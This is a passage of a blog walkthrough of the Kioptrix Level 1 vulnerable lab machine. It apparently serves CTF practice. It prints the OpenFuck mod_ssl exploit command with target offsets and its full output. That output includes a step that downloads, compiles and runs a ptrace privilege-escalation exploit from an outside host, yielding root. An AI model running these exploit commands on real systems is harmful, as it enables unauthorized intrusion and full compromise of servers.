  target - supported box eg: 0x00
  box - hostname or IP address
  port - port for ssl connection
  -c open N connections. (use range 40-50 if u dont know)
  

  Supported OffSet:
	0x00 - Caldera OpenLinux (apache-1.3.26)
</span><span class="c">	...
</span><span class="go">	0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
	0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
</span><span class="c">	...
</span><span class="go">
</span><span class="gp">#</span>&amp;<span class="nv">$@</span> to all guys <span class="nb">who </span>like use lamah ddos. Read SRC to have no surprise
</pre></table></code></div></div><p>What we need:</p><ol><li><strong>target</strong> - offset value from the list<br /> From our nmap scan we know the service version is: “Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)”.<br /> Looking for Red-Hat and 1.3.20 versions leave us with two options:<ul><li><strong>0x6a</strong> - RedHat Linux 7.2 (apache-1.3.20-16)1<li><strong>0x6b</strong> - RedHat Linux 7.2 (apache-1.3.20-16)2</ul><li><strong>box</strong> - target’s IP - ‘kioptrix’ in our case<li><strong>port</strong> - HTTP port - 443 in our case<li><strong>Number of connection</strong> to open (range of 40-50) - We’ll go with 40</ol><p>Therefore the complete command we’ll use: <code class="language-console highlighter-rouge"><span class="go">./Openfuck 0x6b kioptrix 443 -c 40</span></code>:</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
</pre><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span>./OpenFuck 0x6b kioptrix 443 <span class="nt">-c</span> 40
<span class="go">*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
</span><span class="gp">* #</span>hackarena  irc.brasnet.org                                     <span class="k">*</span>
<span class="gp">* TNX Xanthic USG #</span>SilverLords <span class="c">#BloodBR #isotk #highsecure #uname *</span>
<span class="gp">* #</span>ION <span class="c">#delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *</span>
<span class="gp">* #</span>pinchadoresweb HiTechHate DigitalWrapperz P<span class="o">()</span>W GAT ButtP!rateZ <span class="k">*</span>
<span class="go">*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80fa068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
</span><span class="gp">bash-2.05$</span><span class="w"> 
</span><span class="gp">d.c;</span><span class="w"> </span>./exploit<span class="p">;</span> <span class="nt">-kmod</span>.c<span class="p">;</span> gcc <span class="nt">-o</span> exploit ptrace-kmod.c <span class="nt">-B</span> /usr/bin<span class="p">;</span> <span class="nb">rm </span>ptrace-kmo 
<span class="go">--20:52:11--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
</span><span class="gp">           =&gt;</span><span class="w"> </span><span class="sb">`</span>ptrace-kmod.c<span class="s1">'
</span><span class="go">Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

20:52:12 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

gcc: file path prefix `/usr/bin' never used
[+] Attached to 12590
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
whoami
root
</span></pre></table></code></div></div><p>See the whoami command at the end? we’re root :)</p><ul class="task-list"><li class="task-list-item" hide-bullet><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Gain root access to the machine</ul><h1 id="capture-the-flag">Capture The Flag</h1><p>Once we have a <strong><em>shell</em></strong> using on of the above methods, we need to spawn a TTY shell. <code class="language-console highlighter-rouge"><span class="go">/bin/bash -i</span></code> is used to get active <strong><em>bash shell</em></strong>. You can find other options on the post Summary below.</p><p>Let’s look at the user’s commands history:</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre><td class="rouge-code"><pre><span class="gp">[root@kioptrix tmp]#</span><span class="w"> </span><span class="nb">history</span>
<span class="go">history
    1  ls
    2  mail
    3  mail
    4  clear
</span><span class="gp">    5  echo "ls" &gt;</span><span class="w"> </span>.bash_history <span class="o">&amp;&amp;</span> poweroff
<span class="go">    6  nano /etc/issue
    7  pico /etc/issue
    8  pico /etc/issue
    9  ls
   10  clear
   11  ls /home/
   12  exit
   13  ifconfig
   14  poweroff
   15  history
</span></pre></table></code></div></div><p>The mail command might be intresting. We can access mail using <code class="language-console highlighter-rouge"><span class="go">mail</span></code> command interacting with it (selecting what message to read) using message number (Use <code class="language-console highlighter-rouge"><span class="go">exit</span></code> to leave the mail)</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
</pre><td class="rouge-code"><pre><span class="gp">[root@kioptrix tmp]#</span><span class="w"> </span>mail
<span class="go">mail
Mail version 8.1 6/6/93.  Type ? for help.
"/var/mail/root": 2 messages 1 new 2 unread
 U  1 root@kioptix.level1   Sat Sep 26 11:42  15/481   "About Level 2"
</span><span class="gp">&gt;</span>N  2 root@kioptrix.level1  Fri Jan 15 18:08  18/524   <span class="s2">"LogWatch for kioptrix"</span>
<span class="go">
1
Message 1:
From root  Sat Sep 26 11:42:10 2009
Date: Sat, 26 Sep 2009 11:42:10 -0400
</span><span class="gp">From: root &lt;root@kioptix.level1&gt;</span><span class="w">
</span><span class="go">To: root@kioptix.level1
Subject: About Level 2

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

2
Message 2:
From root  Fri Jan 15 18:08:41 2021
Date: Fri, 15 Jan 2021 18:08:41 -0500
</span><span class="gp">From: root &lt;root@kioptrix.level1&gt;</span><span class="w">
</span><span class="go">To: root@kioptrix.level1
Subject: LogWatch for kioptrix.level1

</span><span class="gp"> #</span><span class="c">################# LogWatch 2.1.1 Begin ##################### </span>
<span class="go">
</span><span class="gp"> #</span><span class="c">##################### LogWatch End ######################### </span>
</pre></table></code></div></div><p>That’s our flag!</p><ul class="task-list"><li class="task-list-item" hide-bullet><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Capture the flag</ul><h1 id="privilege-escalation">Privilege Escalation</h1><p>We were able to get root access using any of the above methods.</p><h1 id="summary">Summary</h1><ul><li>Google-Fu - Google is a great source of knowledge which allows you to find known vulnerabilities easily.<li>Some CTFs / Vulnerable machines have more than one way in. Don’t stop on the first one.<h2 id="reading-materials">Reading Materials</h2><li><a href="https://netsec.ws/?p=337">How to spawn a TTY Shell</a></ul></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/vulnhub/'>Vulnhub</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/vulnhub/" class="post-tag no-text-decoration" >vulnhub</a> <a href="/tags/easy/" class="post-tag no-text-decoration" >easy</a> <a href="/tags/ctf/" class="post-tag no-text-decoration" >ctf</a> <a href="/tags/samba/" class="post-tag no-text-decoration" >samba</a> <a href="/tags/smb/" class="post-tag no-text-decoration" >smb</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Kioptrix: Level 1 (#1) - Hacking Walkthroughs, Writeups and Guides&url=https://hummus-ful.github.io/vulnhub/2021/01/17/Kioptrix_1.html" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Kioptrix: Level 1 (#1) - Hacking Walkthroughs, Writeups and Guides&u=https://hummus-ful.github.io/vulnhub/2021/01/17/Kioptrix_1.html" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Kioptrix: Level 1 (#1) - Hacking Walkthroughs, Writeups and Guides&url=https://hummus-ful.github.io/vulnhub/2021/01/17/Kioptrix_1.html" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <a href="https://www.linkedin.com/sharing/share-offsite/?url=https://hummus-ful.github.io/vulnhub/2021/01/17/Kioptrix_1.html" data-toggle="tooltip" data-placement="top" title="Linkedin" target="_blank" rel="noopener" aria-label="Linkedin"> <i class="fa-fw fab fa-linkedin"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"> <span>Recent Update</span><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/oscp/2021/01/26/OSCP_List.html">Tony (@TJ Null) list to PWK/OSCP</a><li><a href="/try-hack-me/2021/01/04/Bolt.html">Bolt</a><li><a href="/try-hack-me/2021/01/15/Pickle_Rick.html">Pickle Rick</a><li><a href="/vulnhub/2021/01/17/Kioptrix_1.html">Kioptrix: Level 1 (#1)</a><li><a href="/tutorials/2021/01/17/Kioptrix_on_VirtualBox.html">How-To: Run Kioptrix On VirtualBox</a></ul></div><div id="access-tags"> <span>Trending Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/easy/">easy</a> <a class="post-tag" href="/tags/ctf/">ctf</a> <a class="post-tag" href="/tags/vulnhub/">vulnhub</a> <a class="post-tag" href="/tags/google-fu/">google-fu</a> <a class="post-tag" href="/tags/metasploit/">metasploit</a> <a class="post-tag" href="/tags/samba/">samba</a> <a class="post-tag" href="/tags/searchsploit/">searchsploit</a> <a class="post-tag" href="/tags/smb/">smb</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/try-hack-me/">try-hack-me</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contents</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/try-hack-me/2021/01/05/Kenobi.html"><div class="card-body"> <span class="timeago small" > Jan 5 <i class="unloaded">2021-01-05T00:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Kenobi</h3><div class="text-muted small"><p> This is a writeup for the Kenobi challenge on Try-Hack-Me. This room will cover accessing a Samba share, manipulating a vulnerable version of proftpd to gain initial access and escalate your privil...</p></div></div></a></div><div class="card"> <a href="/oscp/2021/01/26/OSCP_List.html"><div class="card-body"> <span class="timeago small" > Jan 26 <i class="unloaded">2021-01-26T00:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Tony (@TJ Null) list to PWK/OSCP</h3><div class="text-muted small"><p> Tony (@TJ Null) list to PWK/OSCP [Last update: 2021-05-03] The below list is based on Tony’s (@TJ_Null) list of vulnerable machines. As He wrote: The boxes that are contained in this list sho...</p></div></div></a></div><div class="card"> <a href="/vulnhub/2021/01/22/DC-9.html"><div class="card-body"> <span class="timeago small" > Jan 22 <i class="unloaded">2021-01-22T00:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>DC: 9</h3><div class="text-muted small"><p> DC-9 is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The goal of this challenge is to get root and to read the one and only flag. In...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/try-hack-me/2021/01/15/Pickle_Rick.html" class="btn btn-outline-primary"><p>Pickle Rick</p></a> <a href="/tutorials/2021/01/17/Kioptrix_on_VirtualBox.html" class="btn btn-outline-primary"><p>How-To: Run Kioptrix On VirtualBox</p></a></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2021 <a href="https://twitter.com/hummus_ful">Hummus_Ful</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy/" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/easy/">easy</a> <a class="post-tag" href="/tags/ctf/">ctf</a> <a class="post-tag" href="/tags/vulnhub/">vulnhub</a> <a class="post-tag" href="/tags/google-fu/">google fu</a> <a class="post-tag" href="/tags/metasploit/">metasploit</a> <a class="post-tag" href="/tags/samba/">samba</a> <a class="post-tag" href="/tags/searchsploit/">searchsploit</a> <a class="post-tag" href="/tags/smb/">smb</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/try-hack-me/">try hack me</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://hummus-ful.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
